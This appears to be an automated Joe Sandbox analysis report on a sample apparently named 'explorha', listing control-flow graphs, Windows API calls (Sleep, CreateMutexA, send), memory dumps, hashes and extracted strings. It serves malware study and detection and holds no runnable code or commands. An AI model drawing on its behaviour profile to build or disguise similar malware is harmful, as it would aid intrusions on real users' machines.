                                                                                                                                                                                                                                        • Opcode ID: e66935452129c1e16862224d156f3e180b5ef95db09bbc94e43e6b3777bcf1ac
                                                                                                                                                                                                                                        • Instruction ID: 766b98359194033f840076424c7d9c12e5826bdb3016bce993ff5d239942645b
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e66935452129c1e16862224d156f3e180b5ef95db09bbc94e43e6b3777bcf1ac
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C1310571700344EBFB08DB6CCC997ADB7B2AB86314F208318E415977D6DBBD99808762
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 229 70958c-7095aa 230 7095d8-7095f7 229->230 231 7095ac-7095b8 229->231 232 709625-70a3e6 call 719750 230->232 233 7095f9-709605 230->233 234 7095ba-7095c8 231->234 235 7095ce-7095d5 call 71ecf8 231->235 236 709607-709615 233->236 237 70961b-709622 call 71ecf8 233->237 234->235 239 70a3e7 234->239 235->230 236->237 236->239 237->232 243 70a423-70a466 Sleep CreateMutexA 239->243 244 70a3e7 call 7382fa 239->244 244->243
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • Sleep.KERNELBASE(000003E8), ref: 0070A435
                                                                                                                                                                                                                                        • CreateMutexA.KERNELBASE(00000000,00000000,007651D8), ref: 0070A453
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2151058621.0000000000701000.00000040.00000001.01000000.00000008.sdmp, Offset: 00700000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152324625.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152355017.00000000009F8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152382475.00000000009FD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152409880.00000000009FF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152436972.0000000000A0B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152462990.0000000000A0D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_700000_explorha.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1464230837-0
                                                                                                                                                                                                                                        • Opcode ID: d4509fb148706d320e672f8689d26f3d9030384be7326cfebc7fbd209be32606
                                                                                                                                                                                                                                        • Instruction ID: 1754f6f0eeaa6298865c28f92a1f9db8e630adbb140cc1b9288baedb1bfbcd32
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d4509fb148706d320e672f8689d26f3d9030384be7326cfebc7fbd209be32606
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 40214771604204DBFB18DF68CD887ACFBB2EB81304F208318E9159B7D2DBBE59808751
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 271 70a326-70a33e 272 70a340-70a34c 271->272 273 70a36c-70a36e 271->273 276 70a362-70a369 call 71ecf8 272->276 277 70a34e-70a35c 272->277 274 70a370-70a377 273->274 275 70a379-70a381 call 7078b0 273->275 278 70a3bb-70a3e6 call 719750 274->278 287 70a383-70a38b call 7078b0 275->287 288 70a3b4-70a3b6 275->288 276->273 277->276 280 70a41e-70a458 call 7382fa Sleep CreateMutexA 277->280 292 70a45e-70a466 280->292 287->288 293 70a38d-70a395 call 7078b0 287->293 288->278 293->288 297 70a397-70a39f call 7078b0 293->297 297->288 300 70a3a1-70a3a9 call 7078b0 297->300 300->288 303 70a3ab-70a3b2 300->303 303->278
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • Sleep.KERNELBASE(000003E8), ref: 0070A435
                                                                                                                                                                                                                                        • CreateMutexA.KERNELBASE(00000000,00000000,007651D8), ref: 0070A453
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2151058621.0000000000701000.00000040.00000001.01000000.00000008.sdmp, Offset: 00700000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_700000_explorha.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1464230837-0
                                                                                                                                                                                                                                        • Opcode ID: bc41a88f9874a081440356afb81a8cd00453c014331b6daa2b32426125a901a6
                                                                                                                                                                                                                                        • Instruction ID: 656e1c2a18f24803582edddae00cad730791eeff73c5298d5c7f0262e4d58d8a
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bc41a88f9874a081440356afb81a8cd00453c014331b6daa2b32426125a901a6
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 19212771748304FBF728AB688C9F76DF6E2AF41300F248715E9058A7D2CABD5980C267
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 251 709e1f-709e2b 252 709e41-709e6a call 71ecf8 251->252 253 709e2d-709e3b 251->253 259 709e98-70a3e6 call 719750 252->259 260 709e6c-709e78 252->260 253->252 254 70a40a 253->254 256 70a423-70a466 Sleep CreateMutexA 254->256 257 70a40a call 7382fa 254->257 257->256 261 709e7a-709e88 260->261 262 709e8e-709e95 call 71ecf8 260->262 261->254 261->262 262->259
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • Sleep.KERNELBASE(000003E8), ref: 0070A435
                                                                                                                                                                                                                                        • CreateMutexA.KERNELBASE(00000000,00000000,007651D8), ref: 0070A453
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2151058621.0000000000701000.00000040.00000001.01000000.00000008.sdmp, Offset: 00700000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_700000_explorha.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CreateMutexSleep
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1464230837-0
                                                                                                                                                                                                                                        • Opcode ID: 7a460a0c944b9b38f70cdf0bf4f8a37f9b0252445e0af73f5ee6533130b3e85e
                                                                                                                                                                                                                                        • Instruction ID: 683a58b8ca9d0b95357ed8057b91f099e7f67acf42ec0e8caf90e7599c529857
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7a460a0c944b9b38f70cdf0bf4f8a37f9b0252445e0af73f5ee6533130b3e85e
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0E213572704340EBFB08DB6CCC897ADB7A2EB81311F204328E915976D2DBBD59808751
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 304 73ee4f-73ee5a 305 73ee68-73ee6e 304->305 306 73ee5c-73ee66 304->306 307 73ee70-73ee71 305->307 308 73ee87-73ee98 RtlAllocateHeap 305->308 306->305 309 73ee9c-73eea7 call 738ba3 306->309 307->308 310 73ee73-73ee7a call 73b3e2 308->310 311 73ee9a 308->311 314 73eea9-73eeab 309->314 310->309 317 73ee7c-73ee85 call 73a459 310->317 311->314 317->308 317->309
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0073BE33,00000001,00000364,00000006,000000FF,?,0074045F,?,00000004,00000000,?,?), ref: 0073EE90
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2151058621.0000000000701000.00000040.00000001.01000000.00000008.sdmp, Offset: 00700000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152151116.0000000000980000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152180833.000000000098A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152220435.000000000098B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152220435.00000000009C3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152294324.00000000009F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152324625.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152355017.00000000009F8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152382475.00000000009FD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152409880.00000000009FF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152436972.0000000000A0B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152462990.0000000000A0D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_700000_explorha.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1279760036-0
                                                                                                                                                                                                                                        • Opcode ID: 1917b85ad26b8f5994c44ea6b032a2e0ed6901c89d7acbf5eb66515e3237d570
                                                                                                                                                                                                                                        • Instruction ID: 4f98d250052e05ab33ca9de23299569bc76394a886cb2a930421aa084c5d76c8
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1917b85ad26b8f5994c44ea6b032a2e0ed6901c89d7acbf5eb66515e3237d570
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 27F0E932585234A6FB2126619C05B5B7B989F82760F298111FC08E61C3CF7CEC0041E1
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2151058621.0000000000701000.00000040.00000001.01000000.00000008.sdmp, Offset: 00700000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_700000_explorha.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: Xt$Xt
                                                                                                                                                                                                                                        • API String ID: 0-475810656
                                                                                                                                                                                                                                        • Opcode ID: ac59082c9d6dce2fb0acae6c1eb29a2d77903316a9a26bfd3db1b491670abf65
                                                                                                                                                                                                                                        • Instruction ID: 46d1666ecafddbc1b3e160ed27bdb8499bb4b4570d2edfd9c1c932b231513696
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ac59082c9d6dce2fb0acae6c1eb29a2d77903316a9a26bfd3db1b491670abf65
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 51F14C71E012199BDF14CFA8D8807AEBBF1FF89314F258269D819AB345D735AE01DB90
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2151058621.0000000000701000.00000040.00000001.01000000.00000008.sdmp, Offset: 00700000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_700000_explorha.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _wcsrchr
                                                                                                                                                                                                                                        • String ID: .bat$.cmd$.com$.exe
                                                                                                                                                                                                                                        • API String ID: 1752292252-4019086052
                                                                                                                                                                                                                                        • Opcode ID: 3ec43a65457977cdefc604948bd7cebe09cad8535d32d91fa77c74aae0f139a7
                                                                                                                                                                                                                                        • Instruction ID: 50bdad8e34c835bb0765ae71663e6f2ed5228df12f95239f4e8e8a10f91fa281
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3ec43a65457977cdefc604948bd7cebe09cad8535d32d91fa77c74aae0f139a7
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 87012677A243252636552069BC066B717A99BC1BB4F2A003EFC44F72C3FFACDC425196
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2151058621.0000000000701000.00000040.00000001.01000000.00000008.sdmp, Offset: 00700000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_700000_explorha.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Mtx_unlock$Cnd_broadcast
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 32384418-0
                                                                                                                                                                                                                                        • Opcode ID: a3653bc443d9a3f32a5d3f38b2147e2e8bfad6520b37c434b966908c7d422277
                                                                                                                                                                                                                                        • Instruction ID: 7d773e6781a40ed6cfc29baadf67f964ef928868e095c97b246453030e31e832
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a3653bc443d9a3f32a5d3f38b2147e2e8bfad6520b37c434b966908c7d422277
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EFA1E2B1A01216EFDB21DB68C94879AB7F8FF15354F004229E815D72C2EB38EA45CBD1
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2151058621.0000000000701000.00000040.00000001.01000000.00000008.sdmp, Offset: 00700000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_700000_explorha.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Mtx_unlock
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1418687624-0
                                                                                                                                                                                                                                        • Opcode ID: 55b3bb3b402a5a0fce369dcbd25e392bb08c26e2cde4161125d044a571dc128e
                                                                                                                                                                                                                                        • Instruction ID: d4d0e394292500eff0c75ef4c806bfa7eb144928a819cd833d6d03898969de9b
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 55b3bb3b402a5a0fce369dcbd25e392bb08c26e2cde4161125d044a571dc128e
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0481C3B1A00315DBDB309F68CC49FAAB7E4EF08314F118369E919A72D1DB79AD44CB91
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2151058621.0000000000701000.00000040.00000001.01000000.00000008.sdmp, Offset: 00700000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151857043.0000000000951000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151884415.0000000000956000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151914320.0000000000957000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151940989.000000000095F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151964516.0000000000960000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2151990040.0000000000962000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152020128.000000000096A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152046032.000000000096C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152071170.0000000000977000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152099497.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152125808.000000000097D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152151116.0000000000980000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152180833.000000000098A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152220435.000000000098B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152220435.00000000009C3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152294324.00000000009F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152324625.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152355017.00000000009F8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152382475.00000000009FD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152409880.00000000009FF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152436972.0000000000A0B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152462990.0000000000A0D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_700000_explorha.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Mtx_unlock
                                                                                                                                                                                                                                        • String ID: invalid stoi argument$stoi argument out of range$Sv
                                                                                                                                                                                                                                        • API String ID: 1418687624-3838638389
                                                                                                                                                                                                                                        • Opcode ID: 07aa5d54842227f5a55edc4e91b2eae8cff60c400db8f8342432a23df00175fc
                                                                                                                                                                                                                                        • Instruction ID: 0584fe80cce110151903f1fed53c43b1be9808775ee1e71ae03a05098a947faa
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 07aa5d54842227f5a55edc4e91b2eae8cff60c400db8f8342432a23df00175fc
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4B1182B2A00305DBCF30DFA8D846AA9F3F1EF54311F168565E906676A1EB39AC40CB51
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2151058621.0000000000701000.00000040.00000001.01000000.00000008.sdmp, Offset: 00700000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_700000_explorha.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _strrchr
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3213747228-0
                                                                                                                                                                                                                                        • Opcode ID: b713bfd49b51041abb555fe8b87117765181b7de4fabe3ba4743ab7c7481a45c
                                                                                                                                                                                                                                        • Instruction ID: dcea59b335d4bbad62b031148a89944bf090b059d51f7f88ee544913292c86cc
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b713bfd49b51041abb555fe8b87117765181b7de4fabe3ba4743ab7c7481a45c
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 89B12732900695DFEB15CF68C881BAEBBE5EF55300F24816AE855DB383D63C9D01CB61
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • send.WS2_32(?,?,00000004,00000000), ref: 0070D43E
                                                                                                                                                                                                                                        • send.WS2_32(?,?,00000008,00000000), ref: 0070D47A
                                                                                                                                                                                                                                        • send.WS2_32(?,?,?,00000000), ref: 0070D4BC
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2151058621.0000000000701000.00000040.00000001.01000000.00000008.sdmp, Offset: 00700000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_700000_explorha.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: send
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2809346765-0
                                                                                                                                                                                                                                        • Opcode ID: c12e74bb71e80b5cbba7453acb98be12fd41cb6e18e09374fa949a458735cc21
                                                                                                                                                                                                                                        • Instruction ID: de6d1e44175e4cde55b6a2ad460fe1b4b71adf537b0e39bf1d63b82ca77bd574
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c12e74bb71e80b5cbba7453acb98be12fd41cb6e18e09374fa949a458735cc21
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7241D872E00214DBDB288BBCDC957AEB7B4AF45324F104369EC19E33D1DA38AD408B95
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2151058621.0000000000701000.00000040.00000001.01000000.00000008.sdmp, Offset: 00700000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152125808.000000000097D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152151116.0000000000980000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152180833.000000000098A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152220435.000000000098B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152220435.00000000009C3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152294324.00000000009F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152324625.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152355017.00000000009F8000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152382475.00000000009FD000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152409880.00000000009FF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152436972.0000000000A0B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.2152462990.0000000000A0D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_700000_explorha.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Xtime_diff_to_millis2_xtime_get
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 531285432-0
                                                                                                                                                                                                                                        • Opcode ID: 880257fb6015feed8a9167f03d418d4b7af9960ec41e864ab11c5b83646c3ac4
                                                                                                                                                                                                                                        • Instruction ID: 3ace18804f7452dd607bd0150a9767cece3538ce40f37e3bfa77f63bba975bd4
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 880257fb6015feed8a9167f03d418d4b7af9960ec41e864ab11c5b83646c3ac4
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 25212C75A00219EFDF10EFA8DC859EEBBB9BF49314F100055F901A7291D6789E819BA1
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.2151058621.0000000000701000.00000040.00000001.01000000.00000008.sdmp, Offset: 00700000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_700000_explorha.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ___free_lconv_mon
                                                                                                                                                                                                                                        • String ID: 8Bv$`Gv
                                                                                                                                                                                                                                        • API String ID: 3903695350-1396405441
                                                                                                                                                                                                                                        • Opcode ID: 9bb912093dce9b932f4f62738287f1ae57d2f2298621559bb01b3ce4bfe820b8
                                                                                                                                                                                                                                        • Instruction ID: d03ecb5a9f5dcac42f9a4a0f19f5e475cf2bda1515162e2575b73cb7eeab06bb
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9bb912093dce9b932f4f62738287f1ae57d2f2298621559bb01b3ce4bfe820b8
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 78314F31604745DFEB21AE78D849BA677E9BF40350F208429E599E7292DF7DEC80CB90
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.2820981268.00007FF848CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CB0000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_7ff848cb0000_powershell.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: cf060aee85cead54f7d0898474a1c853a3ff5ba6a9969df129f040243e384edf
                                                                                                                                                                                                                                        • Instruction ID: 556a19ee663a73757ba0f03b4df111e12885eee1467cbc17ae3b7dd2cc54fcf5
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cf060aee85cead54f7d0898474a1c853a3ff5ba6a9969df129f040243e384edf
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 20713B3071CD098FDB98EA2DD495A7A73D2EF99354B14416CE05EC76E2CE24FC42AB48
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.2823333697.00007FF848D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D80000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_7ff848d80000_powershell.jbxd
